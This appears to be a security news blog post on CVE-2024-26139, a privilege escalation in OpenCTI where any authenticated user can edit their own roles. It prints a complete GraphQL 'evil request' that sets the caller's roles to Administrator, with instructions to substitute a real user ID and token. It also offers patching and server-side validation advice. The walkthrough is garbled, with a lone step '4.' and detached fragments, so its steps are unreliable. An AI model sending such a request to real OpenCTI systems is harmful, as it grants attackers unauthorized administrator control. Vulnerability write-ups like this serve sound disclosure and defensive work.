CVE CyberSecurity Database News

CVE-2024-26139 - Privilege Escalation in OpenCTI Lets Attackers Become Admins

Poster -

OpenCTI is a popular open source platform organizations use to manage their cyber threat intelligence data. It helps security teams gather, analyze, and share information about threats and observables in their environment. But even the best tools can have flaws.

In February 2024, a serious vulnerability was found in OpenCTI and tracked as CVE-2024-26139. This bug lets a regular, low-privileged user become a full admin if they know what they are doing. Here’s a simple walkthrough of how this works, code snippets, and what you can do about it.

What is CVE-2024-26139?

This CVE refers to a vulnerability in the “Profile Edit” functionality of OpenCTI. While users should only be able to edit their own information, a lack of backend authorization controls meant any authenticated user could edit their own profile and bump their permissions up to “Admin”.

In plain english:
If you log in as a basic user, you can trick OpenCTI into thinking you’re an admin by tweaking your profile data.

How Does the Exploit Work?

The vulnerability is pretty straightforward. When you edit your profile on OpenCTI, your browser sends a request to the backend with your new details—like your email or password. But the backend doesn’t properly check if you are allowed to edit the role field!

That means, with the right request, you can set your own role to Administrator.

Here's an example evil request

POST /graphql
Host: opencti.example.com
Content-Type: application/json
Authorization: Bearer <user_token>

{
  "query": "mutation UserEdit($id: ID!, $input: EditInput!) { userEdit(id: $id, input: $input) { id, name, roles } }",
  "variables": {
    "id": "YOUR_USER_ID",
    "input": {
      "roles": ["Administrator"]
    }
  }
}

Replace YOUR_USER_ID with your actual user ID and Bearer <user_token> with your token/session.

Copy the profile update request.

4. Modify the request so the roles field includes "Administrator" (make sure not to change anything else).

References

- NVD - CVE-2024-26139
- Security Advisory on GitHub
- OpenCTI Official Site

Why Did This Happen?

The main problem is that the backend didn’t double-check if a user was allowed to change their roles. Even though the interface hides this field from normal users, that’s not enough—security has to be enforced on the server.

This kind of mistake is common in web apps. Always make sure your backend doesn’t trust data sent from the browser!

Validating every update to user profiles.

If you use OpenCTI, make sure to update to the latest version ASAP!

Conclusion

CVE-2024-26139 is a real-world reminder that security is everyone's job. Even simple bugs can have huge consequences if backend validation is missed! If you use OpenCTI, patch up immediately, and double-check your admin users for nasty surprises.

Timeline

Published on: 05/23/2024 12:15:09 UTC
Last modified on: 06/04/2024 17:48:57 UTC